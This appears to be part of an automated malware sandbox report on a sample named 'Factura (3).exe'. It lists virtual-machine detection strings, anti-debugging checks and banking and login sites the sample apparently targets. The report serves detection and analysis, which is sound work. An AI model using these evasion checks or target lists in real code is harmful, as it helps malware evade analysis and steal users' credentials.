            Source: Amcache.hve.17.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12112000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWAREP
            Source: 2E85-1J297.23.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: 2E85-1J297.23.dr | Binary or memory string: outlook.office.comVMware20,11696497155s
            Source: 2E85-1J297.23.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: Amcache.hve.17.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: 2E85-1J297.23.dr | Binary or memory string: dev.azure.comVMware20,11696497155j
            Source: Amcache.hve.17.dr | Binary or memory string: VMware Virtual USB Mouse
            Source: 2E85-1J297.23.dr | Binary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmwareP
            Source: Amcache.hve.17.dr | Binary or memory string: vmci.syshbin
            Source: Amcache.hve.17.dr | Binary or memory string: VMware, Inc.
            Source: Amcache.hve.17.dr | Binary or memory string: VMware20,1hbin@
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: )C:\WINDOWS\system32\drivers\VBoxMouse.sysP
            Source: Amcache.hve.17.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.17.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009AA3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l.comVMware20,11696497155h
            Source: Amcache.hve.17.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\P
            Source: 2E85-1J297.23.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: 2E85-1J297.23.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: 2E85-1J297.23.dr | Binary or memory string: tasks.office.comVMware20,11696497155o
            Source: 2E85-1J297.23.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
            Source: Amcache.hve.17.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.17.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12112000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIP
            Source: chkdsk.exe, 00000017.00000002.3764249613.0000000004F64000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.1859761297.00000226CDC9C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 2E85-1J297.23.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: 2E85-1J297.23.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'C:\WINDOWS\system32\drivers\vmmouse.sysP
            Source: 2E85-1J297.23.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: Amcache.hve.17.dr | Binary or memory string: vmci.syshbin`
            Source: Amcache.hve.17.dr | Binary or memory string: \driver\vmci,\driver\pci
            Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3764836576.0000000001259000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
            Source: 2E85-1J297.23.dr | Binary or memory string: interactivebrokers.comVMware20,11696497155
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: Amcache.hve.17.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: 2E85-1J297.23.dr | Binary or memory string: AMC password management pageVMware20,11696497155
            Source: 2E85-1J297.23.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: Amcache.hve.17.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.17.dr | Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
            Source: 2E85-1J297.23.dr | Binary or memory string: outlook.office365.comVMware20,11696497155t
            Source: 2E85-1J297.23.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
            Source: 2E85-1J297.23.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort (2 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\chkdsk.exe | Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_0541D1C0 rdtsc 14_2_0541D1C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_004175D3 LdrLoadDll, 14_2_004175D3
            Source: C:\Users\user\Desktop\Factura (3).exe | Code function: 6_2_00007FF7340E7EF4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00007FF7340E7EF4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_053CE53E mov eax, dword ptr fs:[00000030h] 14_2_053CE53E (5 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_053DD530 mov eax, dword ptr fs:[00000030h] 14_2_053DD530 (2 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_053B0535 mov eax, dword ptr fs:[00000030h] 14_2_053B0535 (6 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_053AD534 mov eax, dword ptr fs:[00000030h] 14_2_053AD534 (6 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_053D7505 mov eax, dword ptr fs:[00000030h] 14_2_053D7505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_053D7505 mov ecx, dword ptr fs:[00000030h] 14_2_053D7505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_05474500 mov eax, dword ptr fs:[00000030h] 14_2_05474500 (7 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_053DB570 mov eax, dword ptr fs:[00000030h] 14_2_053DB570 (2 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_053D656A mov eax, dword ptr fs:[00000030h] 14_2_053D656A (3 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_0539B562 mov eax, dword ptr fs:[00000030h] 14_2_0539B562
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_0544F525 mov eax, dword ptr fs:[00000030h] 14_2_0544F525 (7 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_053A8550 mov eax, dword ptr fs:[00000030h] 14_2_053A8550 (2 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_0545B52F mov eax, dword ptr fs:[00000030h] 14_2_0545B52F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_05475537 mov eax, dword ptr fs:[00000030h] 14_2_05475537
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_053CF5B0 mov eax, dword ptr fs:[00000030h] 14_2_053CF5B0 (9 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_053C45B1 mov eax, dword ptr fs:[00000030h] 14_2_053C45B1 (2 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_054755C9 mov eax, dword ptr fs:[00000030h] 14_2_054755C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_054735D7 mov eax, dword ptr fs:[00000030h] 14_2_054735D7 (3 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_0541D5D0 mov eax, dword ptr fs:[00000030h] 14_2_0541D5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_0541D5D0 mov ecx, dword ptr fs:[00000030h] 14_2_0541D5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_053C15A9 mov eax, dword ptr fs:[00000030h] 14_2_053C15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15A9 mov eax, dword ptr fs:[00000030h]14_2_053C15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15A9 mov eax, dword ptr fs:[00000030h]14_2_053C15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15A9 mov eax, dword ptr fs:[00000030h]14_2_053C15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15A9 mov eax, dword ptr fs:[00000030h]14_2_053C15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE59C mov eax, dword ptr fs:[00000030h]14_2_053DE59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D4588 mov eax, dword ptr fs:[00000030h]14_2_053D4588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539758F mov eax, dword ptr fs:[00000030h]14_2_0539758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539758F mov eax, dword ptr fs:[00000030h]14_2_0539758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539758F mov eax, dword ptr fs:[00000030h]14_2_0539758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A2582 mov eax, dword ptr fs:[00000030h]14_2_053A2582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A2582 mov ecx, dword ptr fs:[00000030h]14_2_053A2582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15F4 mov eax, dword ptr fs:[00000030h]14_2_053C15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15F4 mov eax, dword ptr fs:[00000030h]14_2_053C15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15F4 mov eax, dword ptr fs:[00000030h]14_2_053C15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15F4 mov eax, dword ptr fs:[00000030h]14_2_053C15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15F4 mov eax, dword ptr fs:[00000030h]14_2_053C15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15F4 mov eax, dword ptr fs:[00000030h]14_2_053C15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DC5ED mov eax, dword ptr fs:[00000030h]14_2_053DC5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DC5ED mov eax, dword ptr fs:[00000030h]14_2_053DC5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542B594 mov eax, dword ptr fs:[00000030h]14_2_0542B594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542B594 mov eax, dword ptr fs:[00000030h]14_2_0542B594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A25E0 mov eax, dword ptr fs:[00000030h]14_2_053A25E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE5E7 mov eax, dword ptr fs:[00000030h]14_2_053CE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE5E7 mov eax, dword ptr fs:[00000030h]14_2_053CE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE5E7 mov eax, dword ptr fs:[00000030h]14_2_053CE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE5E7 mov eax, dword ptr fs:[00000030h]14_2_053CE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE5E7 mov eax, dword ptr fs:[00000030h]14_2_053CE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE5E7 mov eax, dword ptr fs:[00000030h]14_2_053CE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE5E7 mov eax, dword ptr fs:[00000030h]14_2_053CE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE5E7 mov eax, dword ptr fs:[00000030h]14_2_053CE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054205A7 mov eax, dword ptr fs:[00000030h]14_2_054205A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054205A7 mov eax, dword ptr fs:[00000030h]14_2_054205A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054205A7 mov eax, dword ptr fs:[00000030h]14_2_054205A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C95DA mov eax, dword ptr fs:[00000030h]14_2_053C95DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A65D0 mov eax, dword ptr fs:[00000030h]14_2_053A65D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DA5D0 mov eax, dword ptr fs:[00000030h]14_2_053DA5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DA5D0 mov eax, dword ptr fs:[00000030h]14_2_053DA5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE5CF mov eax, dword ptr fs:[00000030h]14_2_053DE5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE5CF mov eax, dword ptr fs:[00000030h]14_2_053DE5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054335BA mov eax, dword ptr fs:[00000030h]14_2_054335BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054335BA mov eax, dword ptr fs:[00000030h]14_2_054335BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054335BA mov eax, dword ptr fs:[00000030h]14_2_054335BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054335BA mov eax, dword ptr fs:[00000030h]14_2_054335BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545F5BE mov eax, dword ptr fs:[00000030h]14_2_0545F5BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D55C0 mov eax, dword ptr fs:[00000030h]14_2_053D55C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DA430 mov eax, dword ptr fs:[00000030h]14_2_053DA430
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545F453 mov eax, dword ptr fs:[00000030h]14_2_0545F453
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539E420 mov eax, dword ptr fs:[00000030h]14_2_0539E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539E420 mov eax, dword ptr fs:[00000030h]14_2_0539E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539E420 mov eax, dword ptr fs:[00000030h]14_2_0539E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539C427 mov eax, dword ptr fs:[00000030h]14_2_0539C427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C340D mov eax, dword ptr fs:[00000030h]14_2_053C340D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0547547F mov eax, dword ptr fs:[00000030h]14_2_0547547F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D8402 mov eax, dword ptr fs:[00000030h]14_2_053D8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D8402 mov eax, dword ptr fs:[00000030h]14_2_053D8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D8402 mov eax, dword ptr fs:[00000030h]14_2_053D8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CA470 mov eax, dword ptr fs:[00000030h]14_2_053CA470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CA470 mov eax, dword ptr fs:[00000030h]14_2_053CA470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CA470 mov eax, dword ptr fs:[00000030h]14_2_053CA470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A1460 mov eax, dword ptr fs:[00000030h]14_2_053A1460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A1460 mov eax, dword ptr fs:[00000030h]14_2_053A1460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A1460 mov eax, dword ptr fs:[00000030h]14_2_053A1460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A1460 mov eax, dword ptr fs:[00000030h]14_2_053A1460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A1460 mov eax, dword ptr fs:[00000030h]14_2_053A1460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF460 mov eax, dword ptr fs:[00000030h]14_2_053BF460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF460 mov eax, dword ptr fs:[00000030h]14_2_053BF460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF460 mov eax, dword ptr fs:[00000030h]14_2_053BF460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF460 mov eax, dword ptr fs:[00000030h]14_2_053BF460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF460 mov eax, dword ptr fs:[00000030h]14_2_053BF460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF460 mov eax, dword ptr fs:[00000030h]14_2_053BF460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539645D mov eax, dword ptr fs:[00000030h]14_2_0539645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C245A mov eax, dword ptr fs:[00000030h]14_2_053C245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB440 mov eax, dword ptr fs:[00000030h]14_2_053AB440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB440 mov eax, dword ptr fs:[00000030h]14_2_053AB440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB440 mov eax, dword ptr fs:[00000030h]14_2_053AB440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB440 mov eax, dword ptr fs:[00000030h]14_2_053AB440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB440 mov eax, dword ptr fs:[00000030h]14_2_053AB440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB440 mov eax, dword ptr fs:[00000030h]14_2_053AB440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE443 mov eax, dword ptr fs:[00000030h]14_2_053DE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE443 mov eax, dword ptr fs:[00000030h]14_2_053DE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE443 mov eax, dword ptr fs:[00000030h]14_2_053DE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE443 mov eax, dword ptr fs:[00000030h]14_2_053DE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE443 mov eax, dword ptr fs:[00000030h]14_2_053DE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE443 mov eax, dword ptr fs:[00000030h]14_2_053DE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE443 mov eax, dword ptr fs:[00000030h]14_2_053DE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE443 mov eax, dword ptr fs:[00000030h]14_2_053DE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D34B0 mov eax, dword ptr fs:[00000030h]14_2_053D34B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D44B0 mov ecx, dword ptr fs:[00000030h]14_2_053D44B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A64AB mov eax, dword ptr fs:[00000030h]14_2_053A64AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054754DB mov eax, dword ptr fs:[00000030h]14_2_054754DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054494E0 mov eax, dword ptr fs:[00000030h]14_2_054494E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539B480 mov eax, dword ptr fs:[00000030h]14_2_0539B480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A9486 mov eax, dword ptr fs:[00000030h]14_2_053A9486
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A9486 mov eax, dword ptr fs:[00000030h]14_2_053A9486
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A04E5 mov ecx, dword ptr fs:[00000030h]14_2_053A04E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542A4B0 mov eax, dword ptr fs:[00000030h]14_2_0542A4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A973A mov eax, dword ptr fs:[00000030h]14_2_053A973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A973A mov eax, dword ptr fs:[00000030h]14_2_053A973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D273C mov eax, dword ptr fs:[00000030h]14_2_053D273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D273C mov ecx, dword ptr fs:[00000030h]14_2_053D273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D273C mov eax, dword ptr fs:[00000030h]14_2_053D273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05399730 mov eax, dword ptr fs:[00000030h]14_2_05399730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05399730 mov eax, dword ptr fs:[00000030h]14_2_05399730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D5734 mov eax, dword ptr fs:[00000030h]14_2_053D5734
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05473749 mov eax, dword ptr fs:[00000030h]14_2_05473749
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05424755 mov eax, dword ptr fs:[00000030h]14_2_05424755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A3720 mov eax, dword ptr fs:[00000030h]14_2_053A3720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF720 mov eax, dword ptr fs:[00000030h]14_2_053BF720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF720 mov eax, dword ptr fs:[00000030h]14_2_053BF720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF720 mov eax, dword ptr fs:[00000030h]14_2_053BF720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DC720 mov eax, dword ptr fs:[00000030h]14_2_053DC720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DC720 mov eax, dword ptr fs:[00000030h]14_2_053DC720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DF71F mov eax, dword ptr fs:[00000030h]14_2_053DF71F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DF71F mov eax, dword ptr fs:[00000030h]14_2_053DF71F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A0710 mov eax, dword ptr fs:[00000030h]14_2_053A0710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D0710 mov eax, dword ptr fs:[00000030h]14_2_053D0710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A5702 mov eax, dword ptr fs:[00000030h]14_2_053A5702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A5702 mov eax, dword ptr fs:[00000030h]14_2_053A5702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A7703 mov eax, dword ptr fs:[00000030h]14_2_053A7703
